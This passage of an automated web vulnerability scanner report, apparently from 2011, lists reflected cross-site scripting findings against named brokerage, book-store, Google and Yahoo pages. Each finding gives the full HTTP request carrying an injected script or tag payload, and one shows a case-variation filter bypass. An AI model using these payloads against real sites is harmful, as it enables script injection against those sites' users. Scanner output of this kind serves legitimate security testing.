Last-Modified: Thu, 08 Sep 2011 20:01:45 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="
...[SNIP]...
<div id="errorboxheader">404 - Component not found (http://www.futurestrading.com/managed-accountsf91b8<script>alert(1)</script>8c91014d9af/what-are-managed-futures.html)</div>
...[SNIP]...

2.15. http://www.globalfutures.com/index.asp [refid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.globalfutures.com
Path:   /index.asp

Issue detail

The value of the refid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee6af"><script>alert(1)</script>ef3961711f was submitted in the refid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.asp?refid=googleaefee6af"><script>alert(1)</script>ef3961711f HTTP/1.1
Host: www.globalfutures.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=futures+trading
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 35093
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: returningRefID=googleaefee6af%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eef3961711f; expires=Wed, 04-Jun-2014 07:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Thu, 08 Sep 2011 19:25:44 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta cont
...[SNIP]...
<input type="hidden" name="reftag" value="googleaefee6af"><script>alert(1)</script>ef3961711f" />
...[SNIP]...

2.16. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a4fc1(a)66a27447bcc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?a4fc1(a)66a27447bcc=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:47:30 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{colo
...[SNIP]...
",d,k)};})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med){google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?a4fc1(a)66a27447bcc\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

2.17. http://www.interactivebrokers.com/mobile/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.interactivebrokers.com
Path:   /mobile/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 881ed"><a%20b%3dc>bec079a6a29 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 881ed"><a b=c>bec079a6a29 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mobile/index.php/881ed"><a%20b%3dc>bec079a6a29 HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:51:02 GMT
Server: Apache
Content-Length: 28145
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form id="app-email-form" action="/mobile/index.php/881ed"><a b=c>bec079a6a29" method="POST">
...[SNIP]...

2.18. http://www.interactivebrokers.com/mobile/index.php/images/btn_continuetowebsite.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.interactivebrokers.com
Path:   /mobile/index.php/images/btn_continuetowebsite.png

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b373"><a%20b%3dc>5dc4835aa60 was submitted in the REST URL parameter 3. This input was echoed as 5b373"><a b=c>5dc4835aa60 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mobile/index.php/images5b373"><a%20b%3dc>5dc4835aa60/btn_continuetowebsite.png HTTP/1.1
Host: www.interactivebrokers.com
Proxy-Connection: keep-alive
Referer: http://www.interactivebrokers.com/mobile/index.php/881ed%22%3E%3Ca%20b%3dc%3Ebec079a6a29
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:08:23 GMT
Server: Apache
Content-Length: 28177
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form id="app-email-form" action="/mobile/index.php/images5b373"><a b=c>5dc4835aa60/btn_continuetowebsite.png" method="POST">
...[SNIP]...

2.19. http://www.interactivebrokers.com/mobile/index.php/images/btn_continuetowebsite.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.interactivebrokers.com
Path:   /mobile/index.php/images/btn_continuetowebsite.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0dac"><a%20b%3dc>49956ecfea3 was submitted in the REST URL parameter 4. This input was echoed as d0dac"><a b=c>49956ecfea3 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mobile/index.php/images/btn_continuetowebsite.pngd0dac"><a%20b%3dc>49956ecfea3 HTTP/1.1
Host: www.interactivebrokers.com
Proxy-Connection: keep-alive
Referer: http://www.interactivebrokers.com/mobile/index.php/881ed%22%3E%3Ca%20b%3dc%3Ebec079a6a29
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:08:30 GMT
Server: Apache
Content-Length: 28177
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form id="app-email-form" action="/mobile/index.php/images/btn_continuetowebsite.pngd0dac"><a b=c>49956ecfea3" method="POST">
...[SNIP]...

2.20. http://www.interactivebrokers.com/mobile/index.php/images/btn_submit.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.interactivebrokers.com
Path:   /mobile/index.php/images/btn_submit.png

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e550c"><a%20b%3dc>76544989d21 was submitted in the REST URL parameter 3. This input was echoed as e550c"><a b=c>76544989d21 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mobile/index.php/imagese550c"><a%20b%3dc>76544989d21/btn_submit.png HTTP/1.1
Host: www.interactivebrokers.com
Proxy-Connection: keep-alive
Referer: http://www.interactivebrokers.com/mobile/index.php/881ed%22%3E%3Ca%20b%3dc%3Ebec079a6a29
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:08:23 GMT
Server: Apache
Content-Length: 28166
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form id="app-email-form" action="/mobile/index.php/imagese550c"><a b=c>76544989d21/btn_submit.png" method="POST">
...[SNIP]...

2.21. http://www.interactivebrokers.com/mobile/index.php/images/btn_submit.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.interactivebrokers.com
Path:   /mobile/index.php/images/btn_submit.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3df40"><a%20b%3dc>45310a5bfce was submitted in the REST URL parameter 4. This input was echoed as 3df40"><a b=c>45310a5bfce in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mobile/index.php/images/btn_submit.png3df40"><a%20b%3dc>45310a5bfce HTTP/1.1
Host: www.interactivebrokers.com
Proxy-Connection: keep-alive
Referer: http://www.interactivebrokers.com/mobile/index.php/881ed%22%3E%3Ca%20b%3dc%3Ebec079a6a29
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:08:30 GMT
Server: Apache
Content-Length: 28166
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form id="app-email-form" action="/mobile/index.php/images/btn_submit.png3df40"><a b=c>45310a5bfce" method="POST">
...[SNIP]...

2.22. http://www.interactivebrokers.com/mobile/index.php/images/request_app_iblogo.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.interactivebrokers.com
Path:   /mobile/index.php/images/request_app_iblogo.png

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84869"><a%20b%3dc>8dd8570e10 was submitted in the REST URL parameter 3. This input was echoed as 84869"><a b=c>8dd8570e10 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mobile/index.php/images84869"><a%20b%3dc>8dd8570e10/request_app_iblogo.png HTTP/1.1
Host: www.interactivebrokers.com
Proxy-Connection: keep-alive
Referer: http://www.interactivebrokers.com/mobile/index.php/881ed%22%3E%3Ca%20b%3dc%3Ebec079a6a29
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:08:23 GMT
Server: Apache
Content-Length: 28173
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form id="app-email-form" action="/mobile/index.php/images84869"><a b=c>8dd8570e10/request_app_iblogo.png" method="POST">
...[SNIP]...

2.23. http://www.interactivebrokers.com/mobile/index.php/images/request_app_iblogo.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.interactivebrokers.com
Path:   /mobile/index.php/images/request_app_iblogo.png

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26054"><a%20b%3dc>b5857bc8409 was submitted in the REST URL parameter 4. This input was echoed as 26054"><a b=c>b5857bc8409 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mobile/index.php/images/request_app_iblogo.png26054"><a%20b%3dc>b5857bc8409 HTTP/1.1
Host: www.interactivebrokers.com
Proxy-Connection: keep-alive
Referer: http://www.interactivebrokers.com/mobile/index.php/881ed%22%3E%3Ca%20b%3dc%3Ebec079a6a29
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:08:30 GMT
Server: Apache
Content-Length: 28174
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form id="app-email-form" action="/mobile/index.php/images/request_app_iblogo.png26054"><a b=c>b5857bc8409" method="POST">
...[SNIP]...

2.24. http://www.interactivebrokers.com/mobile/index.php/m.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.interactivebrokers.com
Path:   /mobile/index.php/m.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e953b"><a%20b%3dc>24c8fdce66a was submitted in the REST URL parameter 3. This input was echoed as e953b"><a b=c>24c8fdce66a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mobile/index.php/m.csse953b"><a%20b%3dc>24c8fdce66a HTTP/1.1
Host: www.interactivebrokers.com
Proxy-Connection: keep-alive
Referer: http://www.interactivebrokers.com/mobile/index.php/881ed%22%3E%3Ca%20b%3dc%3Ebec079a6a29
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ib=googlead; web=1059282

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:08:21 GMT
Server: Apache
Content-Length: 28150
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<form id="app-email-form" action="/mobile/index.php/m.csse953b"><a b=c>24c8fdce66a" method="POST">
...[SNIP]...

2.25. https://www.interactivebrokers.com/sso/Login [forwardTo parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.interactivebrokers.com
Path:   /sso/Login

Issue detail

The value of the forwardTo request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4554"><a%20b%3dc>858eb6fd52c was submitted in the forwardTo parameter. This input was echoed as d4554"><a b=c>858eb6fd52c in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /sso/Login?forwardTo=1d4554"><a%20b%3dc>858eb6fd52c HTTP/1.1
Host: www.interactivebrokers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:49:15 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: XYZAB_AM.LOGIN=; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: XYZAB=; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: URL_PARAM=forwardTo=1d4554a20b3dc858eb6fd52c; Domain=.interactivebrokers.com; Path=/; Secure
Set-Cookie: JSESSIONID=08546737D95F44C0653B32581EDE3A9E.wwwsso3; Path=/sso; Secure
Content-Length: 13290
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
   <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=UTF-8"/>
   <link hre
...[SNIP]...
<input type="hidden" name="action" value="1d4554"><a b=c>858eb6fd52c">
...[SNIP]...

2.26. http://www.invest-store.com/cgi-bin/commoditybooks-bin/category.cgi [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.invest-store.com
Path:   /cgi-bin/commoditybooks-bin/category.cgi

Issue detail

The value of the page request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3488b"><script>alert(1)</script>8d048951567 was submitted in the page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/commoditybooks-bin/category.cgi?page=bargainbuys3488b"><script>alert(1)</script>8d048951567 HTTP/1.1
Host: www.invest-store.com
Proxy-Connection: keep-alive
Referer: http://www.invest-store.com/cgi-bin/commoditybooks-bin/home.cgi?division=books
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UserID=50.23.123.106-20252902820223; FBSBSeen=1; SaneID=50.23.123.106-20252902820223

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:00:37 GMT
Server: Microsoft-IIS/6.0
Expires: Thu, 08 Sep 2011 20:30:37 GMT
Date: Thu, 08 Sep 2011 20:00:37 GMT
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<TITLE>Commodity Books online store</TITLE>
<SCRIPT LANGUAGE="JavaScript">
<!-- hide from old browsers
function S
...[SNIP]...
<input type="hidden" name="page" value="bargainbuys3488b"><script>alert(1)</script>8d048951567">
...[SNIP]...

2.27. http://www.invest-store.com/cgi-bin/commoditybooks-bin/home.cgi [division parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.invest-store.com
Path:   /cgi-bin/commoditybooks-bin/home.cgi

Issue detail

The value of the division request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 743e0"><script>alert(1)</script>93f8ff19375 was submitted in the division parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cgi-bin/commoditybooks-bin/home.cgi?division=books743e0"><script>alert(1)</script>93f8ff19375 HTTP/1.1
Host: www.invest-store.com
Proxy-Connection: keep-alive
Referer: http://www.invest-store.com/commoditybooks/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SaneID=50.23.123.106-20252902820223

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 20:00:29 GMT
Server: Microsoft-IIS/6.0
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<TITLE>Commodity Books online store</TITLE>
<SCRIPT LANGUAGE="JavaScript">
<!-- hide from old browsers
function S
...[SNIP]...
<a HREF="help.cgi?division=books743e0"><script>alert(1)</script>93f8ff19375">
...[SNIP]...

2.28. http://www2.daytrade4less.com/livesupport/image.php [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www2.daytrade4less.com
Path:   /livesupport/image.php

Issue detail

The value of the l request parameter is copied into the HTML document as plain text between tags. The payload 75280<script>alert(1)</script>2fa378bba35 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /livesupport/image.php?l=admin75280<script>alert(1)</script>2fa378bba35&x=1&deptid=0&pagex=http%3A//www.globalfutures.com/index.asp%3Frefid%3Dgoogleaef&unique=1315527938667&refer=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dfutures+trading&text= HTTP/1.1
Host: www2.daytrade4less.com
Proxy-Connection: keep-alive
Referer: http://www.globalfutures.com/index.asp?refid=googleaef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:36:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Content-Length: 139
Connection: close
Content-Type: text/html; charset=UTF-8

<font color="#FF0000">Config error: reason: admin75280<script>alert(1)</script>2fa378bba35 config not found! Exiting... [image.php]</font>

2.29. http://www2.daytrade4less.com/livesupport/js/status_image.php [base_url parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.daytrade4less.com
Path:   /livesupport/js/status_image.php

Issue detail

The value of the base_url request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e3875%20a%3db1797d1b1ec2 was submitted in the base_url parameter. This input was echoed as e3875 a=b1797d1b1ec2 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /livesupport/js/status_image.php?base_url=http://www2.daytrade4less.com/livesupporte3875%20a%3db1797d1b1ec2&l=admin&x=1&deptid=0& HTTP/1.1
Host: www2.daytrade4less.com
Proxy-Connection: keep-alive
Referer: http://www.globalfutures.com/index.asp?refid=googleaef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2011 19:36:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8710

<!--
// please do not use " or ' characters in the click_for_live_support variable or it
// will produce errors and PHP Live! will not function properly
var click_for_live_support = "Click for Live Su
...[SNIP]...
<img src=\"http://www2.daytrade4less.com/livesupporte3875 a=b1797d1b1ec2/images/initiate_close.gif\" width=10 height=10 border=0>
...[SNIP]...

2.30. http://www.pfgbest.com/toolkit/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.pfgbest.com
Path:   /toolkit/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 540d0"><script>alert(1)</script>80305f47048 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /toolkit/ HTTP/1.1
Host: www.pfgbest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=540d0"><script>alert(1)</script>80305f47048

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 08 Sep 2011 19:47:23 GMT
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Length: 74506
Content-Type: text/html
Cache-control: private


<head>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en
...[SNIP]...
<input type="hidden" name="HTTP_REFERER" value="http://www.google.com/search?hl=en&q=540d0"><script>alert(1)</script>80305f47048" />
...[SNIP]...

2.31. http://finance.yahoo.com/news/Retail-gasoline-prices-up-apf-2916275523.html [REST URL parameter 1]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://finance.yahoo.com
Path:   /news/Retail-gasoline-prices-up-apf-2916275523.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0458<ScRiPt>alert(1)</ScRiPt>27c46b4b333 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

